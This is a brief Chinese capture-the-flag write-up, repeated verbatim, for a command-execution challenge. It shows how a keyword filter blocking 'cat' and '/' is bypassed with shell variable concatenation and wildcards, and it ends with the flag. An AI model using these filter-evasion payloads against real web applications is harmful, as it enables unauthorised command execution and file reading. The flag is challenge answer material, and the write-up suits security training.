打开页面就知道是命令执行
输入ls查看,能够显示文件列表;ls /提示hacker,flag也是Hacker,ls .. 返回上级。说明后台过滤了/ cat等关键词,并没有过滤空格
采用拼接方式的payload: a=fl;b=ag.php;c=t;d=ac;$c$d $a$b;
或者 cat fla?.php cat f*
flag: 8b253377d95941f1f862de13ee7c688d
打开页面就知道是命令执行
输入ls查看,能够显示文件列表;ls /提示hacker,flag也是Hacker,ls .. 返回上级。说明后台过滤了/ cat等关键词,并没有过滤空格
采用拼接方式的payload: a=fl;b=ag.php;c=t;d=ac;$c$d $a$b;
或者 cat fla?.php cat f*
flag: 8b253377d95941f1f862de13ee7c688d